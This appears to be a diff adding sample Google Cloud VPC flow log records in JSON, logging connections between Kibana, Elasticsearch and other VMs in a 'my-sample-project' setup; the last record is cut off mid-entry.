+{"insertId":"ut8lbrffooxyx","jsonPayload":{"bytes_sent":"1468","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz4","jsonPayload":{"bytes_sent":"159704","connection":{"dest_ip":"67.43.156.13","dest_port":33548,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393651211Z","packets_sent":"241","reporter":"SRC","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxz3","jsonPayload":{"bytes_sent":"70775","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65320},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220714119Z","packets_sent":"732","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.560917237Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxz9","jsonPayload":{"bytes_sent":"281147","connection":{"dest_ip":"10.87.40.76","dest_port":33542,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150720950Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-projec
t","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"ut8lbrffooxyr","jsonPayload":{"bytes_sent":"63590","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.537763242Z","packets_sent":"340","reporter":"DEST","rtt_msec":"50","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147252064Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} 
+{"insertId":"ut8lbrffooxyy","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34836,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:39.076420731Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:38.961050187Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"} +{"insertId":"1ulp77rfdvho4g","jsonPayload":{"bytes_sent":"1239","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"192.168.2.165","src_port":59623},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"18","reporter":"DEST","rtt_msec":"233","src_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5r","jsonPayload":{"bytes_sent":"63853","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"363","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5k","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":33924},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:20.634435179Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho55","jsonPayload":{"bytes_sent":"252397","connection":{"dest_ip":"67.43.156.13","dest_port":33534,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"260","reporter":"SRC","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnet
work_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho60","jsonPayload":{"bytes_sent":"205787","connection":{"dest_ip":"67.43.156.13","dest_port":33694,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"265","reporter":"SRC","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"67.43.156.13","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pro
ject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"67.43.156.13","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.168.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"67.43.156.13","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.168.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"67.43.156.13","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"67.43.156.13","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
+{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} +{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","
